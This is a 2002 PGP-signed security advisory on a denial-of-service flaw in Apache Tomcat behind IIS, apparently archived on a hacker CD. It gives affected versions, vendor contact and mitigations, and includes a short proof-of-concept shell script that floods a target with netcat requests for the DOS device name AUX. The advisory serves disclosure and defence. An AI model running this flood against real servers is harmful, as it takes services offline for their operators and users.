home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / tomcat / tomcat.dos.sh
Encoding:
PGP Message  |  2002-10-21  |  2.3 KB  |  89 lines

  1. -----BEGIN PGP SIGNED MESSAGE-----
  2.  
  3. <Title:>
  4. Apache Tomcat: Remote denial-of-service vulnerability
  5.  
  6. <Date:>
  7. 2002-09-06
  8.  
  9. <State:>
  10. 2002-10-11
  11.  
  12. <Vendor response:>
  13. Vendor contacted on 2002-09-06.
  14. Vendor is verifying the problem since 2002-09-10.
  15. No news since then...
  16.  
  17. <Operating Systems:>
  18.  
  19. Microsoft Windows 2000
  20. Microsoft Windows NT may be affected as well.
  21.  
  22. <Software:>
  23. Apache Tomcat 3.3
  24. Apache Tomcat 4.0.4
  25. All versions prior to 4.1.x may be affected as well.
  26.  
  27. Apache Tomcat 4.1.10 (and probably higher) is not affected.
  28.  
  29. <Attack:>
  30. A remote attacker can bring the servlet engine to a standstill.
  31.  
  32. <Description:>
  33. In combination with Microsoft's IIS, Apache Tomcat is vulnerable to a
  34. denial-of-service attack.
  35. An attacker can crash the tomcat engine with multiple (e.g. 1000)
  36. requests that contain DOS device names like AUX, LPT1, CON, PRN.
  37.  
  38. Proof of concept code:
  39. When Tomcat is serving servlets and jsp's under /examples/servlet/,
  40. use
  41. :-
  42. - - - - --------8<----------------------------
  43. #!/bin/sh
  44. for i in 1 2 3 4 5 6 7 8 9 0 ; do
  45.   for j in 1 2 3 4 5 6 7 8 9 0 ; do
  46.      for k in 1 2 3 4 5 6 7 8 9 0 ; do
  47.         echo -e "GET /examples/servlet/AUX HTTP/1.0\n\n"|nc
  48. <target_ip>
  49. <target-port> 2>1 >/dev/null &
  50.      done
  51.   done
  52. done
  53. - - - - --------8<----------------------------
  54.  
  55. This attack works on a Microsoft IIS Web Server connecting the Tomcat
  56. engine via the ajp1.3 connector.
  57. Standalone Tomcat engines (connected via the http interface on port
  58. 8080) are not vulnerable.
  59.  
  60. <Risc:>
  61. Probability of an attack: HIGH
  62. Damage probability: MEDIUM-HIGH
  63.  
  64.  
  65. <Recommendation:>
  66. 1) Do not use Apache software on Microsoft operating systems.
  67.  
  68. 2) When using Apache with IIS, enable the URLScan Filter to filter
  69. DOS
  70. device names from HTTP Requests.
  71.  
  72. 3) Update to Apache Tomcat 4.1.x
  73.  
  74. Author: Olaf Schulz
  75.         olaf.schulz@t-systems.com
  76.         http://www.dcert.de
  77.  
  78. -----BEGIN PGP SIGNATURE-----
  79. Version: PGP 6.5.3
  80.  
  81. iQEVAwUBPaanhhAj4oS8JNNNAQGAywgAgbNtMnf54MsqozQsxuJDfR2oU67qUXMf
  82. dMbt7DuyxkRr8sS4+u6vmTvv3v/Da1IfiwlOZcvaRLh+r3+lO1nJUoUZeIVjWW8b
  83. tat0uPKNRxA7b/DJpcQLkohewurDPQlyTV5dJqJpZp6Q8YzRAHIi1WqL4fnZAb6o
  84. fMjIft7MVNs2y/CVpQmofdh4ZTmY0tPdifKIyhxdVBSCpgBES4dZwxX41j9PcHeK
  85. YJpuxm+d6c0PsbbmY5S5BPPBKyg87mQcOHs2bN0JCaxwHoLiXx8zLCQBkhB1xAD7
  86. 0y4u8zMXNT5QVqaOeBig+GFackal6b0Qi+8XSDPZRpiJ8kvywz2maQ==
  87. =+2dL
  88. -----END PGP SIGNATURE-----
  89.